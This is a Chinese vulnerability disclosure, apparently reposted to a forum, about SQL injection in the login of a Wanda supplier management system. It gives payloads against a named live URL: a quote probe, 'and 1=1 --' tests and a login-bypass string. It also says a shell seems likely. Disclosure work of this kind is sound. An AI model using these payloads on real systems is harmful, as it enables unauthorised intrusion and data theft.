万达供应商系统SQL注射漏洞

admin

简要描述：万达某分站sql注入。敏感信息泄露。
; V5 E& `/ R3 G+ v! p6 m5 @详细说明：
万达scm系统登陆框sql注入。
6 L) X! g/ H* V/ d. S; s4 l
* m0 L" J! b) T* r' q. chttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27


7 j5 ?7 E6 ?+ d" A8 a- }( H500错误。
% k3 t% E7 y- \2 q" ]2 R6 W9 h
- m$ o& e. z8 z3 T) v用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
截图有一点问题，用户名，和密码输入' and 1=1 --可以得到相同的提示，可自测。）
9 j  S5 m; @. {( W& c0 @经过分析，登陆验证的过程应该是：

取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
- r7 `  [. z, x! w
oracle数据库，存在注入点。@大连万达，你怎么看？
; E  E/ l- F$ H; a$ vhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png

9 P, y4 d* V3 l. t: R系统里有万达的供应商资料什么的,提交数据的地方随便输入'，提交500错误。没深入。目测可shell。
漏洞证明：
' m! [+ I, Z! o万达scm系统登陆框sql注入。
! S4 m: _0 h+ B, w& E+ P- O
$ K2 ?5 T% w* k# }' z1 Y! h; vhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27

  m. m8 `  l" I+ T! Y" M6 u# L
500错误。
9 a+ D7 Q4 X5 ^4 ]/ k! O
用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png
9 G/ d4 C- J) {6 n( E8 `

5 x/ [  H8 }3 v1 X& j+ C（截图有一点问题）
; ~; v( d' \- Z8 ?) `9 X" t& `
: F2 I/ D$ Q0 N0 k5 U/ B  _$ \怎么饶都饶不过去；经过分析，登陆验证的过程应该是：
- B' q5 [$ I' ]2 q- c
8 |5 @  k4 [7 ^3 {取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
! a$ }& b- z% w$ u
绕过：
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1


5 r- {8 W# \2 L" ^4 Z* H0 ^oracle数据库，存在注入点。@大连万达，你怎么看？
( [: N: Z7 Z" \7 J​系统里有万达的供应商资料什么的，有发布公告，没深入。目测可shell。
+ T$ ~6 f" Z. S8 b% b' V) _' d
9 {1 ^9 [% U. K修复方案：
。。。

( G0 n6 N3 t, o, n+ B- O$ u* V
8 ]+ {# J7 F, f$ d, y3 B  q厂商已经确认
$ O& x! p: F3 P/ @$ f! h, |1 z
2 o7 |6 Y, v; v& [/ S- T. s[/td][/tr]
[/table]

1 I5 L" H/ s5 }8 C& k( U